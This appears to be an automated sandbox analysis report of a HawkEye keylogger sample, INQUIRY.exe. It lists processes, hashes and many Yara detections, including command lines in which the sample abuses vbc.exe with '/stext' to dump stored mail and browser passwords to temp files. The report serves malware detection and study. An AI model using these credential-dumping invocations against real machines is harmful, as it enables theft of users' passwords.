• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.829490755.0000000003E11000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.829490755.0000000003E11000.00000004.00000001.sdmp, Author: Joe Security
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 15:02:35
Start date: 18/11/2020
Path: C:\Users\user\Desktop\INQUIRY.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546
Imagebase: 0x400000
File size: 1009664 bytes
MD5 hash: 0B940145D7D02E5B1B975C99DD5197A4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low

General

Start time: 15:02:39
Start date: 18/11/2020
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
Wow64 process (32bit): true
Commandline: dw20.exe -x -s 2272
Imagebase: 0x10000000
File size: 33936 bytes
MD5 hash: 8D10DA8A3E11747E51F23C882C22BBC3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:02:42
Start date: 18/11/2020
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Imagebase: 0x400000
File size: 1171592 bytes
MD5 hash: C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 15:02:43
Start date: 18/11/2020
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Imagebase: 0x400000
File size: 1171592 bytes
MD5 hash: C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 15:02:45
Start date: 18/11/2020
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2324
Imagebase: 0x990000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

General

Start time: 15:03:14
Start date: 18/11/2020
Path: C:\Users\user\Desktop\INQUIRY.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\INQUIRY.exe
Imagebase: 0x400000
File size: 1009664 bytes
MD5 hash: 0B940145D7D02E5B1B975C99DD5197A4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:03:14
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.863445427.0000000003961000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.863445427.0000000003961000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.863232173.0000000002DE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:03:16
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:03:22
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:dw20.exe -x -s 2100
                                                                      Imagebase:0x10000000
                                                                      File size:33936 bytes
                                                                      MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:15:03:29
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:03:30
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.929210977.0000000003A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.929210977.0000000003A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:03:31
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:03:34
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:dw20.exe -x -s 2284
                                                                      Imagebase:0x10000000
                                                                      File size:33936 bytes
                                                                      MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      General

                                                                      Start time:15:03:38
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000024.00000002.888584585.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

                                                                      General

                                                                      Start time:15:03:38
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000025.00000002.894159498.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
